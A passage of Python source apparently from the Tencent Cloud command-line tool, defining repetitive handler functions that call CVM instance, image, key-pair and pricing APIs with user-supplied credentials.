endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.StopInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.StopInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInstancesStatus(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInstancesStatus", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInstancesStatusRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInstancesStatus(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyImageSharePermission(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyImageSharePermission", g_param[OptionsDefine.Version])
return
param = {
"ImageId": argv.get("--ImageId"),
"AccountIds": Utils.try_to_json(argv, "--AccountIds"),
"Permission": argv.get("--Permission"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyImageSharePermissionRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyImageSharePermission(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeImageSharePermission(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeImageSharePermission", g_param[OptionsDefine.Version])
return
param = {
"ImageId": argv.get("--ImageId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImageSharePermissionRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeImageSharePermission(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceRunInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("InquiryPriceRunInstances", g_param[OptionsDefine.Version])
return
param = {
"Placement": Utils.try_to_json(argv, "--Placement"),
"ImageId": argv.get("--ImageId"),
"InstanceChargeType": argv.get("--InstanceChargeType"),
"InstanceChargePrepaid": Utils.try_to_json(argv, "--InstanceChargePrepaid"),
"InstanceType": argv.get("--InstanceType"),
"SystemDisk": Utils.try_to_json(argv, "--SystemDisk"),
"DataDisks": Utils.try_to_json(argv, "--DataDisks"),
"VirtualPrivateCloud": Utils.try_to_json(argv, "--VirtualPrivateCloud"),
"InternetAccessible": Utils.try_to_json(argv, "--InternetAccessible"),
"InstanceCount": Utils.try_to_json(argv, "--InstanceCount"),
"InstanceName": argv.get("--InstanceName"),
"LoginSettings": Utils.try_to_json(argv, "--LoginSettings"),
"SecurityGroupIds": Utils.try_to_json(argv, "--SecurityGroupIds"),
"EnhancedService": Utils.try_to_json(argv, "--EnhancedService"),
"ClientToken": argv.get("--ClientToken"),
"HostName": argv.get("--HostName"),
"TagSpecification": Utils.try_to_json(argv, "--TagSpecification"),
"InstanceMarketOptions": Utils.try_to_json(argv, "--InstanceMarketOptions"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceRunInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.InquiryPriceRunInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyHostsAttribute(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyHostsAttribute", g_param[OptionsDefine.Version])
return
param = {
"HostIds": Utils.try_to_json(argv, "--HostIds"),
"HostName": argv.get("--HostName"),
"RenewFlag": argv.get("--RenewFlag"),
"ProjectId": Utils.try_to_json(argv, "--ProjectId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyHostsAttributeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyHostsAttribute(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeImages(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeImages", g_param[OptionsDefine.Version])
return
param = {
"ImageIds": Utils.try_to_json(argv, "--ImageIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
"InstanceType": argv.get("--InstanceType"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeImagesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeImages(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeZoneInstanceConfigInfos(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeZoneInstanceConfigInfos", g_param[OptionsDefine.Version])
return
param = {
"Filters": Utils.try_to_json(argv, "--Filters"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeZoneInstanceConfigInfosRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeZoneInstanceConfigInfos(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyInstancesAttribute(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyInstancesAttribute", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"InstanceName": argv.get("--InstanceName"),
"SecurityGroups": Utils.try_to_json(argv, "--SecurityGroups"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyInstancesAttributeRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyInstancesAttribute(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRegions(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeRegions", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeRegionsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeRegions(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceResetInstancesInternetMaxBandwidth(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("InquiryPriceResetInstancesInternetMaxBandwidth", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"InternetAccessible": Utils.try_to_json(argv, "--InternetAccessible"),
"StartTime": argv.get("--StartTime"),
"EndTime": argv.get("--EndTime"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceResetInstancesInternetMaxBandwidthRequest()
model.from_json_string(json.dumps(param))
rsp = client.InquiryPriceResetInstancesInternetMaxBandwidth(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisassociateInstancesKeyPairs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DisassociateInstancesKeyPairs", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"KeyIds": Utils.try_to_json(argv, "--KeyIds"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisassociateInstancesKeyPairsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DisassociateInstancesKeyPairs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateKeyPair(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateKeyPair", g_param[OptionsDefine.Version])
return
param = {
"KeyName": argv.get("--KeyName"),
"ProjectId": Utils.try_to_json(argv, "--ProjectId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateKeyPairRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateKeyPair(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteKeyPairs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DeleteKeyPairs", g_param[OptionsDefine.Version])
return
param = {
"KeyIds": Utils.try_to_json(argv, "--KeyIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteKeyPairsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DeleteKeyPairs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateDisasterRecoverGroup(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateDisasterRecoverGroup", g_param[OptionsDefine.Version])
return
param = {
"Name": argv.get("--Name"),
"Type": argv.get("--Type"),
"ClientToken": argv.get("--ClientToken"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateDisasterRecoverGroupRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateDisasterRecoverGroup(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeInstances", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doImportKeyPair(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ImportKeyPair", g_param[OptionsDefine.Version])
return
param = {
"KeyName": argv.get("--KeyName"),
"ProjectId": Utils.try_to_json(argv, "--ProjectId"),
"PublicKey": argv.get("--PublicKey"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ImportKeyPairRequest()
model.from_json_string(json.dumps(param))
rsp = client.ImportKeyPair(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doAssociateInstancesKeyPairs(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("AssociateInstancesKeyPairs", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"KeyIds": Utils.try_to_json(argv, "--KeyIds"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.AssociateInstancesKeyPairsRequest()
model.from_json_string(json.dumps(param))
rsp = client.AssociateInstancesKeyPairs(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRunInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("RunInstances", g_param[OptionsDefine.Version])
return
param = {
"Placement": Utils.try_to_json(argv, "--Placement"),
"ImageId": argv.get("--ImageId"),
"InstanceChargeType": argv.get("--InstanceChargeType"),
"InstanceChargePrepaid": Utils.try_to_json(argv, "--InstanceChargePrepaid"),
"InstanceType": argv.get("--InstanceType"),
"SystemDisk": Utils.try_to_json(argv, "--SystemDisk"),
"DataDisks": Utils.try_to_json(argv, "--DataDisks"),
"VirtualPrivateCloud": Utils.try_to_json(argv, "--VirtualPrivateCloud"),
"InternetAccessible": Utils.try_to_json(argv, "--InternetAccessible"),
"InstanceCount": Utils.try_to_json(argv, "--InstanceCount"),
"InstanceName": argv.get("--InstanceName"),
"LoginSettings": Utils.try_to_json(argv, "--LoginSettings"),
"SecurityGroupIds": Utils.try_to_json(argv, "--SecurityGroupIds"),
"EnhancedService": Utils.try_to_json(argv, "--EnhancedService"),
"ClientToken": argv.get("--ClientToken"),
"HostName": argv.get("--HostName"),
"ActionTimer": Utils.try_to_json(argv, "--ActionTimer"),
"DisasterRecoverGroupIds": Utils.try_to_json(argv, "--DisasterRecoverGroupIds"),
"TagSpecification": Utils.try_to_json(argv, "--TagSpecification"),
"InstanceMarketOptions": Utils.try_to_json(argv, "--InstanceMarketOptions"),
"UserData": argv.get("--UserData"),
"DryRun": Utils.try_to_json(argv, "--DryRun"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RunInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.RunInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteImages(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DeleteImages", g_param[OptionsDefine.Version])
return
param = {
"ImageIds": Utils.try_to_json(argv, "--ImageIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteImagesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DeleteImages(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doInquiryPriceResizeInstanceDisks(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("InquiryPriceResizeInstanceDisks", g_param[OptionsDefine.Version])
return
param = {
"InstanceId": argv.get("--InstanceId"),
"DataDisks": Utils.try_to_json(argv, "--DataDisks"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.InquiryPriceResizeInstanceDisksRequest()
model.from_json_string(json.dumps(param))
rsp = client.InquiryPriceResizeInstanceDisks(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doTerminateInstances(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("TerminateInstances", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CvmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.TerminateInstancesRequest()
model.from_json_string(json.dumps(param))
rsp = client.TerminateInstances(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyInstancesVpcAttribute(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyInstancesVpcAttribute", g_param[OptionsDefine.Version])
return
param = {
"InstanceIds": Utils.try_to_json(argv, "--InstanceIds"),
"VirtualPrivateCloud": Utils.try_to_json(argv, "--VirtualPrivateCloud"),
"ForceStop": Utils.try_to_json(argv, "--ForceStop"),
"ReserveHostName": Utils.try_to_json(argv, "--ReserveHostName"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
